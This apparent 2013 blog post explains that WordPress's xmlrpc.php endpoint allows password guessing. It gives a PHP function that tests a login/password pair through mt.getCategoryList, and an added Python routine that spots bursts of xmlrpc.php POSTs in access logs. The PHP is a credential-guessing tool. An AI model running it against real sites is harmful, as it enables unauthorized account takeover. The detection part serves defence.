Saturday, April 13, 2013

Wordpress password guessing with xmlrpc.php

Recently WordPress-powered websites have been under a password guessing attack. Since everyone writes about /wp-login.php and /wp-admin and gives tips on how to protect these files, I'd like to mention that the xmlrpc.php file (the WordPress XML-RPC "handler") also allows an attacker to perform credential guessing.

I've written a simple script in PHP that checks whether a login/password pair is valid via the XML-RPC mt.getCategoryList method (other methods also take login and password parameters; just look inside wp-includes/class-wp-xmlrpc-server.php).

<?php
// Sends one mt.getCategoryList call to a WordPress XML-RPC endpoint and returns the raw
// response. A wrong login/password pair comes back as an XML-RPC fault (faultCode 403)
// inside an HTTP 200 response, so the caller has to inspect the body, not the status code.
function wp_xmlrpc_test($url = '', $login = 'admin', $password = 'admin') {

    // Method call body: blog id, username, password. The XML was lost from the post
    // and is restored here from the standard mt.getCategoryList parameter order.
    $xml = '<?xml version="1.0" encoding="utf-8"?>'
         . '<methodCall><methodName>mt.getCategoryList</methodName><params>'
         . '<param><value><string>1</string></value></param>'
         . '<param><value><string>' . htmlspecialchars($login) . '</string></value></param>'
         . '<param><value><string>' . htmlspecialchars($password) . '</string></value></param>'
         . '</params></methodCall>';

    $uri = parse_url($url);
    $header = array();
    $header[] = "Host: " . $uri['host'];
    $header[] = "Content-type: text/xml";
    $header[] = "Content-length: " . strlen($xml);   // byte length, so strlen rather than mb_strlen

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');

    $result = curl_exec($ch);
    curl_close($ch);

    return $result;
}

var_dump( wp_xmlrpc_test('') );

PS. There is even a method for listing the available methods (mt.supportedMethods) :)
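Because xmlrpc.php answers a wrong password with HTTP 200 and an XML-RPC fault, the status column of the access log is useless for spotting this kind of guessing; the usable signal is the rate of POSTs to /xmlrpc.php per source. The following is an added example (not from the post) that flags sources exceeding a threshold inside a sliding window; the log lines are constructed and the threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line; we need only source, time and request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (not real traffic): 203.0.113.5 hammers xmlrpc.php,
# the other two sources are ordinary visitors.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Apr/2013:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Apr/2013:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 9210 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2013:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2013:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
192.0.2.9 - - [13/Apr/2013:10:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 611 "-" "WordPress-Android"
203.0.113.5 - - [13/Apr/2013:10:00:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2013:10:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2013:10:00:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?", 1)[0]

def find_xmlrpc_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map source IP -> peak number of POSTs to /xmlrpc.php inside one sliding `window`,
    keeping only sources that reach `threshold`. The HTTP status is ignored on purpose:
    xmlrpc.php answers a wrong password with HTTP 200 and an XML-RPC fault, so the
    per-source request rate is the signal an access log actually gives you."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent xmlrpc.php POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[2] != "POST" or rec[3] != "/xmlrpc.php":
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:     # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged
```

Running `find_xmlrpc_bursts(SAMPLE_LOG.splitlines())` on the sample flags only 203.0.113.5 (6 POSTs within the window); the single POST from the mobile-app source is left alone.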